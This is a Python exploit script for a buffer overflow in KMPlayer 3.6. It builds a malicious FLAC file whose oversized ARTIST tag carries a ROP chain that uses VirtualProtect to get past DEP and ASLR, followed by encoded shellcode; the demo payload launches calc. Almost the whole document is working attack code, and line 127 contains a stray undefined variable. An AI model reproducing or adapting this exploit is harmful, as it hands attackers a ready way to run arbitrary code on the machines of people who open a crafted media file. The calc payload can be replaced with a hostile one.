KMPlayer 3.6 exploit

1. from socket import *
2. import sys
3. import struct
4. import time
5.  
6. """
7. Kmplayer 3.6 Buffer Overflow exploit
8. *Very* Low Reliablity :I
9. By sweetchip
10.  
11. """
12. print "\n[*] Kmplayer Exploit | Bypadd ASLR. DEP | ASCII only"
13. print "[*] Author : sweetchip | 2013.04.18\n"
14. print "[*] Public Release Date : 2015.11.12"
15.  
16. filename = "Exploit_bypass_ASLR_DEP.flac"
17.  
18. # Header
19. Head1 = ("\x66\x4C\x61\x43\x00\x00\x00\x22\x10\x00\x10\x00\x00\x0B\x3E\x00\x2E"
20.          "\x50\x0B\xB8\x02\xF0\x00\x91\x57\x93\x6F\x0C\x93\x12\xF9\xE0\x24\xF7"
21.          "\x6B\x80\x38\x24\x7A\xBC\x64\x5A\x04")
22. head2 = "\x00\x00\x00\x01\x00\x00\x00"
23. EndofHead = ("\x81\x00\xA4\x46")
24.  
25. # cmd = calc
26. # encoder - x86/alpha_mixed
27. shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
28.             "\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
29.             "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42"
30.             "\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x7a\x48"
31.             "\x6c\x49\x55\x50\x53\x30\x43\x30\x55\x30\x4c\x49\x49\x75"
32.             "\x54\x71\x4e\x32\x32\x44\x6c\x4b\x33\x62\x70\x30\x4e\x6b"
33.             "\x62\x72\x56\x6c\x4c\x4b\x72\x72\x44\x54\x4e\x6b\x71\x62"
34.             "\x35\x78\x64\x4f\x4d\x67\x42\x6a\x57\x56\x44\x71\x59\x6f"
35.             "\x70\x31\x79\x50\x6e\x4c\x77\x4c\x70\x61\x61\x6c\x46\x62"
36.             "\x44\x6c\x55\x70\x5a\x61\x68\x4f\x54\x4d\x67\x71\x58\x47"
37.             "\x6a\x42\x58\x70\x32\x72\x71\x47\x4e\x6b\x46\x32\x52\x30"
38.             "\x4e\x6b\x30\x42\x75\x6c\x75\x51\x6a\x70\x6e\x6b\x31\x50"
39.             "\x50\x78\x4d\x55\x69\x50\x53\x44\x72\x6a\x37\x71\x38\x50"
40.             "\x66\x30\x4e\x6b\x37\x38\x64\x58\x4e\x6b\x43\x68\x77\x50"
41.             "\x36\x61\x59\x43\x6a\x43\x67\x4c\x73\x79\x4c\x4b\x54\x74"
42.             "\x4e\x6b\x77\x71\x7a\x76\x55\x61\x79\x6f\x65\x61\x69\x50"
43.             "\x4e\x4c\x69\x51\x5a\x6f\x44\x4d\x46\x61\x78\x47\x50\x38"
44.             "\x49\x70\x30\x75\x4a\x54\x65\x53\x71\x6d\x38\x78\x75\x6b"
45.             "\x73\x4d\x65\x74\x72\x55\x59\x72\x62\x78\x4c\x4b\x53\x68"
46.             "\x36\x44\x57\x71\x69\x43\x62\x46\x6e\x6b\x74\x4c\x42\x6b"
47.             "\x4c\x4b\x31\x48\x47\x6c\x63\x31\x78\x53\x6c\x4b\x37\x74"
48.             "\x4e\x6b\x33\x31\x4a\x70\x6d\x59\x42\x64\x44\x64\x47\x54"
49.             "\x51\x4b\x33\x6b\x35\x31\x31\x49\x33\x6a\x73\x61\x79\x6f"
50.             "\x59\x70\x62\x78\x33\x6f\x33\x6a\x4e\x6b\x64\x52\x5a\x4b"
51.             "\x6c\x46\x53\x6d\x30\x6a\x33\x31\x6c\x4d\x4e\x65\x4f\x49"
52.             "\x45\x50\x33\x30\x37\x70\x36\x30\x51\x78\x46\x51\x6c\x4b"
53.             "\x50\x6f\x6e\x67\x79\x6f\x78\x55\x4f\x4b\x48\x70\x4d\x65"
54.             "\x6c\x62\x31\x46\x33\x58\x6c\x66\x4c\x55\x6f\x4d\x4d\x4d"
55.             "\x4b\x4f\x48\x55\x35\x6c\x55\x56\x63\x4c\x77\x7a\x6d\x50"
56.             "\x79\x6b\x39\x70\x74\x35\x45\x55\x4f\x4b\x62\x67\x46\x73"
57.             "\x74\x32\x42\x4f\x63\x5a\x45\x50\x53\x63\x69\x6f\x4b\x65"
58.             "\x55\x33\x43\x51\x52\x4c\x61\x73\x37\x70\x41\x41")
59.  
60.  
61. #############################################################################################################################################
62. ##### ROP
63. ##### special thanks to mona and corelan team
64. #############################################################################################################################################
65. rop_gadgets = ""
66. rop_gadgets += struct.pack('<I',0x10064b1f)# XCHG EAX,ESP # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
67. rop_gadgets += struct.pack('<L',0x10126c47) #POP EAX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
68. rop_gadgets += struct.pack('<L',0x11047e74) # ptr to &VirtualProtect() [IAT bass.dll]
69. rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
70. rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
71. rop_gadgets += "DEAD"
72. rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
73. rop_gadgets += "BEEF"
74. rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
75. rop_gadgets += "SWEE"
76. rop_gadgets += struct.pack('<L',0x10120637) * 337 # INC EAX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
77. rop_gadgets += struct.pack('<L',0x11022f69) # MOV EAX,DWORD PTR DS:[EAX] # RETN [bass.dll]
78. rop_gadgets += struct.pack('<L',0x11033e30) # XCHG EAX,ESI # RETN [bass.dll]
79. rop_gadgets += struct.pack('<L',0x10060210) # POP EBP # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
80. rop_gadgets += struct.pack('<L',0x10146f65) # PUSH ESP # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
81. rop_gadgets += struct.pack('<L',0x11010754) # POP EBX # RETN    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
82. rop_gadgets += struct.pack('<L',0x00005050) # 0x00000201-> ebx
83. rop_gadgets += struct.pack('<L',0x10126623) # POP EDX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
84. rop_gadgets += struct.pack('<L',0x00000040) # 0x00000040-> edx
85. rop_gadgets += struct.pack('<L',0x1013555c) # POP ECX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
86. rop_gadgets += struct.pack('<L',0x7d782020) # Writable location 7d782020
87. rop_gadgets += struct.pack('<L',0x10120b13) # POP EDI # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
88. rop_gadgets += struct.pack('<L',0x100d0240) # RETN (ROP NOP) [bass_wv.dll]
89. rop_gadgets += struct.pack('<L',0x10126c47) # POP EAX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
90. rop_gadgets += struct.pack('<L',0x44444444) # inc inc inc inc lol
91. rop_gadgets += struct.pack('<L',0x1001442e) # PUSHAD # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
92. #############################################################################################################################################
93.  
94. stage1 = ""
95. stage1 += "C" * 3028
96. stage1 += rop_gadgets
97. stage1 += shellcode
98.  
99. #65536
100. # trigger a BOF / and will Execute shellcode
101. artist = "ARTIST="
102. artist += "A" * 60000
103. artist += "A" * 4848
104. artist += struct.pack('<I', 0x7d79192c)
105. artist += "A" * 137
106. artist += struct.pack('<I', 0x10402f0f) # POP ESP # RETN    ** [bass_flac.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
107. artist += struct.pack('<I', 0x7d791930) # ptr to 7d761930
108. artist += "B" * (140000 -4848-4-4-4-137)
109. artist += stage1
110. artist += "Z" * (65536-len(stage1))
111. artist += stage1
112. artist += "Z" * (65536-len(stage1))
113. artist += stage1
114. artist += "Z" * (65536-len(stage1))
115. artist += stage1
116. artist += "Z" * (65536-len(stage1))
117. artist += stage1
118. artist += "Z" * (65536-len(stage1))
119. artist += stage1
120. artist += "Z" * (65536-len(stage1))
121. artist += stage1
122. artist += "Z" * (65536-len(stage1))
123.  
124. #artist += "C" * 3028
125. #artist += rop_gadgets
126. #artist += shellcode
127. sartist += "A" * 100000
128. artistlength = struct.pack('<I', len(artist))
129.  
130. # length
131. payloadlen = struct.pack('>I', len(head2 + EndofHead + artistlength + artist)*256)
132.  
133. # Payload.
134. exploit = Head1
135. exploit += payloadlen
136. exploit += head2
137. exploit += artistlength
138. exploit += artist
139. exploit += EndofHead
140. exploit += "\x00" * 118000
141.  
142. print "\n[*] Generating Flac file....."
143. print "[ ] Payload size :", (len(exploit))
144. print "[ ] Shellcode size : \n"
145.  
146. f = open(filename,'w')
147. f.write(exploit)
148. f.close()
149.  
150. print "[*] Malicious File generated Successfully!!!"
151. print "[ ] file name : " + filename
152.  
153. raw_input("\npress enter to continue :D . . . . .")
154. #End OF Source.